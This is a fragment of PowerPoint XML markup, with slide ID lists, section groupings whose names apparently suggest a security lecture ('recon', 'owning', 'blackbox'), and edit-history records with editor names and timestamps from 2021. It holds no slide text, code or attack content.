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62"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId63"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="403" r:id="rId2"/>
    <p:sldId id="286" r:id="rId3"/>
    <p:sldId id="278" r:id="rId4"/>
    <p:sldId id="299" r:id="rId5"/>
    <p:sldId id="344" r:id="rId6"/>
    <p:sldId id="353" r:id="rId7"/>
    <p:sldId id="304" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="350" r:id="rId10"/>
    <p:sldId id="405" r:id="rId11"/>
    <p:sldId id="306" r:id="rId12"/>
    <p:sldId id="305" r:id="rId13"/>
    <p:sldId id="406" r:id="rId14"/>
    <p:sldId id="407" r:id="rId15"/>
    <p:sldId id="381" r:id="rId16"/>
    <p:sldId id="378" r:id="rId17"/>
    <p:sldId id="393" r:id="rId18"/>
    <p:sldId id="383" r:id="rId19"/>
    <p:sldId id="376" r:id="rId20"/>
    <p:sldId id="315" r:id="rId21"/>
    <p:sldId id="316" r:id="rId22"/>
    <p:sldId id="312" r:id="rId23"/>
    <p:sldId id="384" r:id="rId24"/>
    <p:sldId id="385" r:id="rId25"/>
    <p:sldId id="313" r:id="rId26"/>
    <p:sldId id="317" r:id="rId27"/>
    <p:sldId id="327" r:id="rId28"/>
    <p:sldId id="394" r:id="rId29"/>
    <p:sldId id="386" r:id="rId30"/>
    <p:sldId id="314" r:id="rId31"/>
    <p:sldId id="395" r:id="rId32"/>
    <p:sldId id="318" r:id="rId33"/>
    <p:sldId id="326" r:id="rId34"/>
    <p:sldId id="325" r:id="rId35"/>
    <p:sldId id="347" r:id="rId36"/>
    <p:sldId id="329" r:id="rId37"/>
    <p:sldId id="333" r:id="rId38"/>
    <p:sldId id="348" r:id="rId39"/>
    <p:sldId id="334" r:id="rId40"/>
    <p:sldId id="335" r:id="rId41"/>
    <p:sldId id="320" r:id="rId42"/>
    <p:sldId id="340" r:id="rId43"/>
    <p:sldId id="343" r:id="rId44"/>
    <p:sldId id="345" r:id="rId45"/>
    <p:sldId id="346" r:id="rId46"/>
    <p:sldId id="339" r:id="rId47"/>
    <p:sldId id="397" r:id="rId48"/>
    <p:sldId id="331" r:id="rId49"/>
    <p:sldId id="404" r:id="rId50"/>
    <p:sldId id="332" r:id="rId51"/>
    <p:sldId id="337" r:id="rId52"/>
    <p:sldId id="336" r:id="rId53"/>
    <p:sldId id="321" r:id="rId54"/>
    <p:sldId id="338" r:id="rId55"/>
    <p:sldId id="322" r:id="rId56"/>
    <p:sldId id="398" r:id="rId57"/>
    <p:sldId id="396" r:id="rId58"/>
    <p:sldId id="400" r:id="rId59"/>
    <p:sldId id="401" r:id="rId60"/>
    <p:sldId id="402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AA2F141-E2CC-409D-AA8E-23145FF3C235}">
          <p14:sldIdLst>
            <p14:sldId id="403"/>
            <p14:sldId id="286"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="setup" id="{EE749055-338B-46F6-B6FB-D58F29D9F391}">
          <p14:sldIdLst>
            <p14:sldId id="278"/>
            <p14:sldId id="299"/>
            <p14:sldId id="344"/>
            <p14:sldId id="353"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="recon" id="{C5D14E91-F93D-4683-94F8-A03CC8D743A5}">
          <p14:sldIdLst>
            <p14:sldId id="304"/>
            <p14:sldId id="297"/>
            <p14:sldId id="350"/>
            <p14:sldId id="405"/>
            <p14:sldId id="306"/>
            <p14:sldId id="305"/>
            <p14:sldId id="406"/>
            <p14:sldId id="407"/>
            <p14:sldId id="381"/>
            <p14:sldId id="378"/>
            <p14:sldId id="393"/>
            <p14:sldId id="383"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="automated" id="{D372BD59-5A24-458F-92B0-B7ECF7A04443}">
          <p14:sldIdLst>
            <p14:sldId id="376"/>
            <p14:sldId id="315"/>
            <p14:sldId id="316"/>
            <p14:sldId id="312"/>
            <p14:sldId id="384"/>
            <p14:sldId id="385"/>
            <p14:sldId id="313"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="owning" id="{10C7D202-0B52-4586-AF19-420816756917}">
          <p14:sldIdLst>
            <p14:sldId id="317"/>
            <p14:sldId id="327"/>
            <p14:sldId id="394"/>
            <p14:sldId id="386"/>
            <p14:sldId id="314"/>
            <p14:sldId id="395"/>
            <p14:sldId id="318"/>
            <p14:sldId id="326"/>
            <p14:sldId id="325"/>
            <p14:sldId id="347"/>
            <p14:sldId id="329"/>
            <p14:sldId id="333"/>
            <p14:sldId id="348"/>
            <p14:sldId id="334"/>
            <p14:sldId id="335"/>
            <p14:sldId id="320"/>
            <p14:sldId id="340"/>
            <p14:sldId id="343"/>
            <p14:sldId id="345"/>
            <p14:sldId id="346"/>
            <p14:sldId id="339"/>
            <p14:sldId id="397"/>
            <p14:sldId id="331"/>
            <p14:sldId id="404"/>
            <p14:sldId id="332"/>
            <p14:sldId id="337"/>
            <p14:sldId id="336"/>
            <p14:sldId id="321"/>
            <p14:sldId id="338"/>
            <p14:sldId id="322"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="blackbox" id="{E2B007F0-A162-4E7C-BA4F-13DAAE207F5F}">
          <p14:sldIdLst>
            <p14:sldId id="398"/>
            <p14:sldId id="396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Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld modSection">
      <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-28T01:51:46.137" v="254" actId="47"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T22:17:38.128" v="253" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="359293037" sldId="332"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T22:17:34.836" v="252" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T22:17:02.069" v="231" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:graphicFrameMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T22:17:28.026" v="240" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:picMk id="6" creationId="{B5715245-A97A-4F08-95C8-AC681CD029F7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T22:17:06.268" v="233" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:picMk id="7" creationId="{9C537299-9090-4916-8B42-DDDD189DCC1D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T22:17:38.128" v="253" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:picMk id="8" creationId="{B9D24003-B6E1-4B4B-9827-7A2540E01C4C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T21:14:59.309" v="6" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3337772329" sldId="396"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T21:14:59.309" v="6" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3337772329" sldId="396"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T21:14:46.107" v="5" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="867080924" sldId="398"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T21:14:46.107" v="5" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="867080924" sldId="398"/>
            <ac:spMk id="13315" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-28T01:51:46.137" v="254" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2358485260" sldId="408"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{418228F4-906F-4023-880F-7E22CFD24346}" dt="2021-02-27T21:27:02.475" v="8"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2358485260" sldId="408"/>
            <ac:spMk id="2" creationId="{CB258AA7-D71C-4F52-AADF-1D5DAFD9A4E2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{1D08A72C-3E5C-C448-9D33-4202E3183091}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{1D08A72C-3E5C-C448-9D33-4202E3183091}" dt="2021-02-01T16:30:33.060" v="0"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modNotes">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{1D08A72C-3E5C-C448-9D33-4202E3183091}" dt="2021-02-01T16:30:33.060" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3145720203" sldId="401"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{EF8EFB55-4945-8C4C-6928-74C4CC6AC311}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{EF8EFB55-4945-8C4C-6928-74C4CC6AC311}" dt="2021-02-01T17:14:10.748" v="23"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modNotes">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{EF8EFB55-4945-8C4C-6928-74C4CC6AC311}" dt="2021-02-01T17:14:10.748" v="23"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3145720203" sldId="401"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}"/>
    <pc:docChg chg="undo custSel delSld modSld modMainMaster modSection">
      <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:51:34.480" v="1356"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:48:21.463" v="67" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1222945309" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:48:21.463" v="67" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1222945309" sldId="299"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:36.692" v="191" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1132253304" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:36.692" v="191" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1132253304" sldId="305"/>
            <ac:spMk id="6" creationId="{C1C82AEB-9B6B-4D68-ACF1-364CD543205F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:28.867" v="189" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2013018156" sldId="308"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:56.792" v="193" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3517362306" sldId="309"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T15:31:38.355" v="711" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="849144394" sldId="314"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T15:31:38.355" v="711" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="849144394" sldId="314"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T15:30:05.612" v="592" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2710883720" sldId="326"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T15:30:05.612" v="592" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2710883720" sldId="326"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T15:36:41.241" v="813" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="286808471" sldId="344"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T15:36:41.241" v="813" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="286808471" sldId="344"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:54:08.645" v="221" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="924371248" sldId="347"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:54:08.645" v="221" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="924371248" sldId="347"/>
            <ac:spMk id="3" creationId="{BCA46ACE-DDE2-4471-A4E5-02482D599A1B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:54:17.285" v="222" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="483284103" sldId="348"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:54:17.285" v="222" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="483284103" sldId="348"/>
            <ac:spMk id="3" creationId="{A3913878-1D3B-4DEB-A189-7F347CB0B033}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:20.392" v="188" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2507460228" sldId="350"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:20.392" v="188" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2507460228" sldId="350"/>
            <ac:spMk id="6" creationId="{DFC3F441-BAB3-49FA-8C1A-20FDE3B5AA9E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:10.463" v="187" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="793455369" sldId="353"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:10.463" v="187" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="793455369" sldId="353"/>
            <ac:spMk id="2" creationId="{544DCDB2-CBFA-43BA-A7A4-B62B3BFEA37F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:49:51.694" v="192" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3454021984" sldId="354"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:52:17.519" v="219" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2931009892" sldId="376"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:52:17.519" v="219" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2931009892" sldId="376"/>
            <ac:spMk id="13315" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:52:51.118" v="220" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3001330121" sldId="395"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T14:52:51.118" v="220" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3001330121" sldId="395"/>
            <ac:spMk id="3" creationId="{BEB3A7BB-B764-4FC2-A98C-1388862E6EA9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:45:13.832" v="1067" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3337772329" sldId="396"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:45:13.832" v="1067" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3337772329" sldId="396"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:51:07.398" v="1355" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3361478584" sldId="400"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:51:07.398" v="1355" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361478584" sldId="400"/>
            <ac:spMk id="2" creationId="{0B0B44B3-6E83-41F1-9DC4-5EF21D7979AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:39:03.023" v="836" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361478584" sldId="400"/>
            <ac:spMk id="3" creationId="{2876CFCD-4F0C-4158-9AA0-32432F339221}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:39:44.406" v="851" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361478584" sldId="400"/>
            <ac:picMk id="4" creationId="{CD9D8849-8181-40E7-8AB1-5C8C874AB696}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:45:26.056" v="1069" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361478584" sldId="400"/>
            <ac:picMk id="6" creationId="{1239DFDA-5582-4E8C-A70E-A8D45A9C9FBA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modNotesTx">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:49:24.190" v="1339" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3145720203" sldId="401"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{C223827B-CA76-49BF-85AD-98111D80E0B3}" dt="2021-02-01T18:45:46.300" v="1074"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145720203" sldId="401"/>
            <ac:spMk id="2" creationId="{53500E92-7708-42B5-A176-511CE23E77CD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
